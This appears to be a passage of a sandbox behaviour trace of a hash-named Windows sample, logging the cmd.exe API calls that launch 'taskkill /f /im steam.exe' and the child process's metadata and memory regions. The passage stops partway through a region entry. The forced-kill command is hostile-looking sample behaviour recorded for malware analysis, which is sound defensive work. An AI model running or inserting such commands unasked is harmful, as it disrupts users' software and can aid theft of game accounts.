[0218.032] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0218.032] GetProcessHeap () returned 0x750000 [0218.032] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xe0) returned 0x75a970 [0218.036] GetProcessHeap () returned 0x750000 [0218.036] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x75a970, Size=0x76) returned 0x75a970 [0218.036] GetProcessHeap () returned 0x750000 [0218.036] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x75a970) returned 0x76 [0218.036] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.036] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im steam.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0218.036] GetLastError () returned 0x3 [0218.036] GetProcessHeap () returned 0x750000 [0218.037] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x75fc58) returned 1 [0218.037] GetProcessHeap () returned 0x750000 [0218.038] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x763c68) returned 1 [0218.038] GetProcessHeap () returned 0x750000 [0218.039] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x75bc40) returned 1 [0218.039] GetConsoleOutputCP () returned 0x1b5 [0218.041] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0218.041] GetUserDefaultLCID () returned 0x409 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0218.042] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0218.043] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0218.043] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0218.045] GetProcessHeap () returned 0x750000 [0218.046] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20c) returned 0x75aa38 [0218.046] GetConsoleTitleW (in: lpConsoleTitle=0x75aa38, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0218.047] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0218.047] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0218.047] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0218.047] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0218.047] GetProcessHeap () returned 0x750000 [0218.047] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x400a) returned 0x75bc40 [0218.047] GetProcessHeap () returned 0x750000 [0218.048] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x75bc40) returned 1 [0218.048] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0218.049] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0218.049] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0218.049] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0218.049] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0218.049] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0218.049] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0218.049] GetProcessHeap () returned 0x750000 [0218.049] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x58) returned 0x75ac50 [0218.049] GetProcessHeap () returned 0x750000 [0218.049] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1a) returned 0x750578 [0218.049] GetProcessHeap () returned 0x750000 [0218.049] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2e) returned 0x75acb0 [0218.050] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0218.051] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0218.051] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0218.051] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0218.052] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0218.052] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0218.052] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0218.052] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0218.052] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0218.052] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0218.052] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0218.052] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0218.052] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0218.052] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0218.052] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0218.052] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0218.052] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0218.052] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0218.052] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0218.052] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0218.052] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0218.052] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0218.052] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0218.052] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0218.052] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0218.052] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0218.052] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0218.052] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0218.052] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0218.052] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0218.052] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0218.052] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0218.053] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0218.053] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0218.053] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0218.053] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0218.053] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0218.053] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0218.053] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0218.053] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0218.053] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0218.053] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0218.053] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0218.053] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0218.053] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0218.053] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0218.053] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0218.053] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0218.053] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0218.053] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0218.053] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0218.053] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0218.053] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0218.053] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0218.053] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0218.053] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0218.053] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0218.053] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0218.053] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0218.053] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0218.053] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0218.054] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0218.054] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0218.054] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0218.054] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0218.054] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0218.054] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0218.054] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0218.054] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0218.054] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0218.054] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0218.054] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0218.054] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0218.054] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0218.054] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0218.054] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0218.054] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0218.054] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0218.054] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0218.054] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0218.054] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0218.054] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0218.054] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0218.054] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0218.054] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0218.054] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0218.054] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0218.054] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0218.055] GetProcessHeap () returned 0x750000 [0218.055] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x210) returned 0x75ace8 [0218.055] GetProcessHeap () returned 0x750000 [0218.055] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x40) returned 0x75af00 [0218.055] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0218.055] GetProcessHeap () returned 0x750000 [0218.055] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x418) returned 0x7505c8 [0218.055] SetErrorMode (uMode=0x0) returned 0x8003 [0218.055] SetErrorMode (uMode=0x1) returned 0x0 [0218.055] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7505d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0218.055] SetErrorMode (uMode=0x8003) returned 0x1 [0218.055] GetProcessHeap () returned 0x750000 [0218.055] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x7505c8, Size=0x56) returned 0x7505c8 [0218.055] GetProcessHeap () returned 0x750000 [0218.056] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x7505c8) returned 0x56 [0218.056] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0218.056] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.056] GetProcessHeap () returned 0x750000 [0218.056] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x110) returned 0x75af48 [0218.056] GetProcessHeap () returned 0x750000 [0218.056] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x218) returned 0x750628 [0218.061] GetProcessHeap () returned 0x750000 [0218.061] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x750628, Size=0x112) returned 0x750628 [0218.061] GetProcessHeap () returned 0x750000 [0218.061] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x750628) returned 0x112 [0218.061] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0218.061] GetProcessHeap () returned 0x750000 [0218.061] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xe0) returned 0x75b060 [0218.062] GetProcessHeap () returned 0x750000 [0218.062] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x75b060, Size=0x76) returned 0x75b060 [0218.062] GetProcessHeap () returned 0x750000 [0218.062] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x75b060) returned 0x76 [0218.062] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.063] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0218.063] GetLastError () returned 0x2 [0218.063] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.063] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x75b0e0 [0218.063] GetProcessHeap () returned 0x750000 [0218.063] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x757498 [0218.063] FindClose (in: hFindFile=0x75b0e0 | out: hFindFile=0x75b0e0) returned 1 [0218.064] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0218.064] GetLastError () returned 0x2 [0218.064] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x75b0e0 [0218.064] GetProcessHeap () returned 0x750000 [0218.064] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x757498, Size=0x4) returned 0x75b120 [0218.064] FindClose (in: hFindFile=0x75b0e0 | out: hFindFile=0x75b0e0) returned 1 [0218.064] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0218.064] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0218.064] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0218.065] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0218.065] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0218.065] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158)) [0218.065] GetProcessHeap () returned 0x750000 [0218.065] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x18) returned 0x757538 [0218.065] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0218.066] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0218.067] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0218.067] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0218.067] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0218.067] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0218.067] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0218.067] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0218.067] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0218.067] GetProcessHeap () returned 0x750000 [0218.067] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x757538) returned 1 [0218.067] GetProcessHeap () returned 0x750000 [0218.067] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xa) returned 0x75b0e0 [0218.067] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0218.070] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im steam.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im steam.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im steam.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x830, dwThreadId=0x4c4)) returned 1 [0218.086] CloseHandle (hObject=0x98) returned 1 [0218.086] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0218.086] GetProcessHeap () returned 0x750000 [0218.086] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x759d40) returned 1 [0218.087] GetEnvironmentStringsW () returned 0x759d40* [0218.087] GetProcessHeap () returned 0x750000 [0218.087] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xa76) returned 0x75bc40 [0218.087] FreeEnvironmentStringsA (penv="=") returned 1 [0218.087] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0219.064] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0219.064] CloseHandle (hObject=0x9c) returned 1 [0219.065] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0219.065] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0219.065] GetProcessHeap () returned 0x750000 [0219.066] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x75bc40) returned 1 [0219.066] GetEnvironmentStringsW () returned 0x75b130* [0219.066] GetProcessHeap () returned 0x750000 [0219.066] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xa9c) returned 0x75bbd8 [0219.066] FreeEnvironmentStringsA (penv="=") returned 1 [0219.066] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0219.066] GetProcessHeap () returned 0x750000 [0219.066] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x75bbd8) returned 1 [0219.066] GetEnvironmentStringsW () returned 0x75b130* [0219.066] GetProcessHeap () returned 0x750000 [0219.066] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xa9c) returned 0x75bbd8 [0219.066] FreeEnvironmentStringsA (penv="=") returned 1 [0219.066] GetProcessHeap () returned 0x750000 [0219.066] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x75b0e0) returned 1 [0219.066] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0219.066] _get_osfhandle (_FileHandle=1) returned 0x154 [0219.066] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0219.067] _get_osfhandle (_FileHandle=1) returned 0x154 [0219.067] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0219.067] _get_osfhandle (_FileHandle=0) returned 0x144 [0219.067] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0219.067] GetConsoleOutputCP () returned 0x1b5 [0219.069] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0219.069] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.071] exit (_Code=128) Thread: id = 368 os_tid = 0x9b8 Process: id = "72" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x4c466000" os_pid = "0x830" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "71" os_parent_pid = "0xc04" cmd_line = "taskkill /f /im steam.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5165 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5166 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5167 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5168 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 5169 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 5170 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 5171 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 5172 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 5173 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 5174 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5175 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = 